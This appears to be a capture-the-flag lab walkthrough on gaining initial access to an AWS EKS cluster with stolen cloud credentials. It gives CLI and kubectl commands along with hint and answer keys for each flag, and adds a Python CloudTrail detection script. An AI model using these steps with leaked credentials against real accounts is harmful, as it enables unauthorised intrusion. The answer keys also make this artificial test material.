
Kubernetes Initial Access

Microsoft's Threat Matrix for Kubernetes highlights a number of Initial Access techniques used by attackers to compromise a cluster. One of the techniques, documented as Using cloud credentials, occurs when cloud credentials are stolen or unintentionally leaked.

AWS CLI Configuration

The AWS Command Line Interface (CLI) provides programmatic access to the AWS service APIs. To gain access to the AWS Elastic Kubernetes Cluster (EKS), you need to configure the AWS CLI to use the stolen credentials that you received from the village hosts. Set the required AWS CLI environment variables to use the stolen credentials. What is the name of the compromised AWS principal?

Hint
  • The AWS CLI checks several locations for credentials when authenticating to the AWS APIs, in a fixed order: environment variables first, then the local configuration file (~/.aws/credentials), and finally the instance metadata service when running inside an AWS compute environment (EC2, Lambda, etc.). Because environment variables take precedence, setting the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_DEFAULT_REGION environment variables to the stolen credentials overrides any credentials already configured on the host.

    export AWS_ACCESS_KEY_ID=STOLEN_ACCESS_KEY
    export AWS_SECRET_ACCESS_KEY=STOLEN_SECRET_KEY
    export AWS_DEFAULT_REGION=STOLEN_REGION
    
  • The AWS Security Token Service (STS) exposes a GetCallerIdentity API that returns details about the IAM user or role making the call; it succeeds for any valid credentials regardless of attached IAM policies, which is why it is the usual first call made with an unknown key. Use the aws sts get-caller-identity command to retrieve the compromised principal's name and AWS account id.

    aws sts get-caller-identity
    

    Expected Output

    {
      "UserId": "AIDA2ZCFBDI7W52ZHQYQ7",
      "Account": "123456789012",
      "Arn": "arn:aws:iam::123456789012:user/?????"
    }
    
Answer
  • The compromised principal's name is in the Arn field in the output, which identifies an IAM user named kubeace-maverick followed by a random identifier.

    kubeace-maverick-randomid
    

AWS EKS Initial Access

Amazon's Elastic Kubernetes Service (EKS) is a managed Kubernetes service that makes it simple to run Kubernetes on AWS without needing to install, configure, and maintain your own Kubernetes control plane. EKS is integrated with many AWS services, including the Identity and Access Management (IAM) service.

With the appropriate EKS access entry and permissions, AWS principals can configure kubectl to authenticate directly to the EKS cluster.

  1. Use the AWS CLI to search the AWS account for EKS clusters. What is the name of the EKS cluster that you need to access?

    Hint
    • The aws eks list-clusters command lists the EKS clusters in the specified AWS account.

      aws eks list-clusters
      

      Expected Output

      {
        "clusters": [
          "?????"
        ]
      }
      
    Answer
    • The EKS cluster you need to access is named hth-eks-cluster.

      hth-eks-cluster
      
  2. Use the AWS CLI to update your machine's kubeconfig file and access the EKS cluster. Which Kubernetes group(s) is the compromised AWS principal a member of?

    Hint
    • The aws eks update-kubeconfig command writes the details kubectl needs to authenticate to the hth-eks-cluster cluster into the ~/.kube/config file. No token is stored: the kubeconfig entry runs aws eks get-token on every kubectl call, so the AWS credential environment variables must remain set in the shell.

      aws eks update-kubeconfig --name hth-eks-cluster
      

      Expected Output

      Updated context arn:aws:eks:us-west-2:123456789012:cluster/hth-eks-cluster in /Users/user/.kube/config
      
    • Similar to the aws sts get-caller-identity command, kubectl has its own command that returns details about the authenticated user (it requires a cluster that serves the SelfSubjectReview API, generally available since Kubernetes 1.28). Use the kubectl auth whoami command to view the compromised principal's group memberships.

      kubectl auth whoami
      

      Expected Output

      ATTRIBUTE                                              VALUE
      Username                                               kubeace-maverick-randomid
      UID                                                    aws-iam-authenticator:123456789012:AIDA2ZCFBDI7W52ZHQYQ7
      Groups                                                 [?????]
      Extra: accessKeyId                                     [AKIA2ZCFBDI74CS5EG5L]
      Extra: arn                                             [arn:aws:iam::123456789012:user/kubeace-maverick-randomid]
      Extra: canonicalArn                                    [arn:aws:iam::123456789012:user/kubeace-maverick-randomid]
      Extra: principalId                                     [AIDA2ZCFBDI7W52ZHQYQ7]
      Extra: sessionName                                     []
      Extra: sigs.k8s.io/aws-iam-authenticator/principalId   [AIDA2ZCFBDI7W52ZHQYQ7]
      
    Answer
    • The compromised principal is a member of the hth-data-viewers and system:authenticated groups. Based on the name of the first group (hth-data-viewers), it is likely that the principal has read-only access to data inside the cluster.

      Expected Output

      Groups [hth-data-viewers system:authenticated]
      
  3. Use kubectl to list the namespaces in the Kubernetes cluster. Which namespace do you think contains the hth data?

    Hint
    • Run the kubectl get namespaces command to list the namespaces in the EKS cluster.

      kubectl get namespaces
      

      Expected Output

      NAME                STATUS   AGE
      amazon-cloudwatch   Active   5d18h
      calico-system       Active   5d17h
      cert-manager        Active   5d17h
      default             Active   5d18h
      gatekeeper-system   Active   5d17h
      ?????               Active   5d17h
      kube-node-lease     Active   5d18h
      kube-public         Active   5d18h
      kube-system         Active   5d18h
      tigera-operator     Active   5d17h
      
    Answer
    • The hth namespace contains the Kubernetes resources that are viewable by members of the hth-data-viewers group.

      Expected Output

      hth                 Active   5d17h
      
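
As an added detection example (not part of the walkthrough), the following Python scans CloudTrail records for the AWS API-call sequence performed in the steps above with a stolen key: GetCallerIdentity, then ListClusters, then DescribeCluster (the call aws eks update-kubeconfig makes to fetch the cluster endpoint and CA). All records and access key ids are constructed sample data; the principal ARN and cluster name are the ones from this page.

```python
# Added detection example (not from the original walkthrough). Scans CloudTrail records for
# the call sequence a stolen key issues before reaching the cluster: sts:GetCallerIdentity
# -> eks:ListClusters -> eks:DescribeCluster. All records below are constructed sample data.
from datetime import datetime, timedelta

SEQUENCE = [("sts.amazonaws.com", "GetCallerIdentity"),
            ("eks.amazonaws.com", "ListClusters"),
            ("eks.amazonaws.com", "DescribeCluster")]
USER_ARN = "arn:aws:iam::123456789012:user/kubeace-maverick-randomid"  # ARN from the walkthrough

def _rec(t, source, name, ip, key, arn, cluster=None):
    # Minimal CloudTrail record: only the fields the detection reads
    rec = {"eventTime": t, "eventSource": source, "eventName": name, "sourceIPAddress": ip,
           "userIdentity": {"accessKeyId": key, "arn": arn}}
    if cluster:
        rec["requestParameters"] = {"name": cluster}
    return rec

SAMPLE_RECORDS = [
    _rec("2024-05-01T10:00:00Z", "sts.amazonaws.com", "GetCallerIdentity", "203.0.113.7", "AKIAEXAMPLE0000001", USER_ARN),
    _rec("2024-05-01T10:01:30Z", "eks.amazonaws.com", "ListClusters", "203.0.113.7", "AKIAEXAMPLE0000001", USER_ARN),
    _rec("2024-05-01T10:02:10Z", "eks.amazonaws.com", "DescribeCluster", "203.0.113.7", "AKIAEXAMPLE0000001", USER_ARN, "hth-eks-cluster"),
    # benign CI role: lists clusters but never calls GetCallerIdentity first
    _rec("2024-05-01T10:05:00Z", "eks.amazonaws.com", "ListClusters", "10.0.0.5", "ASIAEXAMPLE0000002", "arn:aws:sts::123456789012:assumed-role/ci/build"),
]

def _ts(rec): return datetime.strptime(rec["eventTime"], "%Y-%m-%dT%H:%M:%SZ")

def find_recon_sequences(records, window_minutes=30):
    """One finding per access key that issued SEQUENCE, in order, within the window."""
    by_key = {}
    for rec in records:
        by_key.setdefault(rec["userIdentity"].get("accessKeyId", "?"), []).append(rec)
    findings = []
    for key, recs in by_key.items():
        step, start = 0, None
        for rec in sorted(recs, key=_ts):
            if step and _ts(rec) - start > timedelta(minutes=window_minutes):
                step, start = 0, None  # partial match went stale; start over
            if (rec["eventSource"], rec["eventName"]) != SEQUENCE[step]:
                continue
            start = start or _ts(rec)
            step += 1
            if step == len(SEQUENCE):
                findings.append({"accessKeyId": key, "arn": rec["userIdentity"]["arn"],
                                 "sourceIPAddress": rec["sourceIPAddress"],
                                 "cluster": rec.get("requestParameters", {}).get("name"),
                                 "seconds": int((_ts(rec) - start).total_seconds())})
                step, start = 0, None
    return findings
```

Each finding names the key, the source IP and the cluster that was described, which is what an incident responder needs to scope which cluster's audit log to pull next.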

Village Challenges

Now that you have successfully gained access to the EKS cluster using the compromised AWS credentials, it is time to start elevating privileges inside the cluster and exfiltrating HTH data. Navigate to the Airborneio-24 Challenge to find the first flag.